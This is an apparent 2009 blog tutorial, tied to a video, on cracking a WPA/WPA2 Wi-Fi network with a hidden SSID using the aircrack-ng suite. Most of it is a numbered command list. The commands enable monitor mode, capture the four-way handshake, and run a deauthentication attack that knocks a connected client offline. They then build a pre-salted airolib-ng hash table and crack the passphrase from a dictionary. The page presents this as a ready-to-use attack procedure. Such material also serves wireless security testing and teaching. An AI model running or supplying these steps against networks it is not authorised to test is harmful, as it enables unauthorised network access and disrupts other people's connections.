Cracking WiFi - WPA/WPA2 With Hidden SSID (Aircrack-ng + Airolib-ng)

How to crack a wireless network using WPA/WPA2 (PSK/AES) encryption with a connected client (as both have same method!) . Then using a pre-computed hash table which has been “pre-salted” with the ESSID for the network to get the pass-phrase.

Links

Watch video on-line:

Download video: http://download.g0tmi1k.com/videos_archive/WPA2-airolib-ng_[Hidden_SSID].mp4

Method

  • Captures a 4-way handshake
  • Creates a quick DoS (Denial of Service) attack at connected client to force them to disconnect and reconnect
  • Apply a brute force dictionary attack to the handshake

Tools

  • Aircrack-ng suite
  • WiFi card that supports monitor mode
  • Big dictionary
  • Processing power

Software

Name: Aircrack-ng

Version: 1.0-rc3

Home Page: http://www.aircrack-ng.org/doku.php

Download Link: hxxp://download.aircrack-ng.org/aircrack-ng-1.0-rc3.tar.gz

Commands

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
airmon-ng start wlan0

airodump-ng mon0
airodump-ng --bssid 00:1B:9E:B2:60:00 -c 1 -w output mon0

aireplay-ng --deauth 10 -a 00:1B:9E:B2:60:00 -c 00:12:17:94:90:0D mon0

airolib-ng crackwpa --import passwd /root/tools/dictionaries/g0tmi1k.lst
kate ~/essid
airolib-ng crackwpa --import essid ~/essid
airolib-ng crackwpa --stats
airolib-ng crackwpa --clean all
airolib-ng crackwpa --batch
airolib-ng crackwpa --verify all

aircrack-ng -r crackwpa output*.cap

Notes

  • This is cut from my final video called “g0tmi1k’s home network”.
  • There HAS to be a CONNECT client.
  • The pass-phrase HAS to be in the dictionary - so if you use something like http://grc.com/pass, the chances of it being crack is next to nothing!

Song: Sub Focus - Rock It

Video length: 03:53

Capture length: 04:03

Blog Post: http://blog.g0tmi1k.com/2009/07/cracking-wifi-wpawpa2-hidden-ssid/